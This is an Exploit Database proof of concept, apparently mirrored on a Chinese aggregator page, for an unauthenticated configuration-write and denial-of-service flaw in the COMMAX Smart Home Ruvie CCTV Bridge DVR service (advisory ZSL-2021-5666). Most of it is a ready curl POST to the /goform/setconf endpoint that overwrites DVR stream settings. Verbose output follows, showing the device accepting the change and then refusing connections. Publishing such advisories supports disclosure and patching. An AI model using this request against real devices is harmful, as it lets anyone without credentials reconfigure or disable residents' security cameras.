COMMAX Smart Home Ruvie CCTV Bridge DVR Service – Config Write / DoS (Unauthenticated)

• Exploit Database
• 13 阅读

• 作者： LiquidWorm
  日期： 2021-08-16
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50209/

• # Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)
  # Date: 02.08.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.commax.com
  
  COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS
  
  
  Vendor: COMMAX Co., Ltd.
  Prodcut web page: https://www.commax.com
  Affected version: n/a
  
  Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
  complex that provides advanced life values and safety.
  
  Desc: The application allows an unauthenticated attacker to change the configuration
  of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.
  
  Tested on: GoAhead-Webs
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5666
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php
  
  
  02.08.2021
  
  --
  
  
  #1
  
  $ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"
  
  * Trying 192.168.1.1...
  * TCP_NODELAY set
  * Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
  > POST /goform/setconf HTTP/1.1
  > Host: 192.168.1.1:8086
  > User-Agent: curl/7.55.1
  > Accept: */*
  > Content-Length: 257
  > Content-Type: application/x-www-form-urlencoded
  >
  * upload completely sent off: 257 out of 257 bytes
  * HTTP 1.0, assume close after body
  < HTTP/1.0 200 OK
  < Server: GoAhead-Webs
  < Pragma: no-cache
  < Cache-control: no-cache
  < Content-Type: text/html
  <
  <html>
  <br><br><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html>
  * Closing connection 0
  
  #2
  
  $ curl -v http://192.168.1.1:8086
  * Rebuilt URL to: http://192.168.1.1:8086/
  * Trying 192.168.1.1...
  * TCP_NODELAY set
  * connect to 192.168.1.1 port 8086 failed: Connection refused
  * Failed to connect to 192.168.1.1 port 8086: Connection refused
  * Closing connection 0
  curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused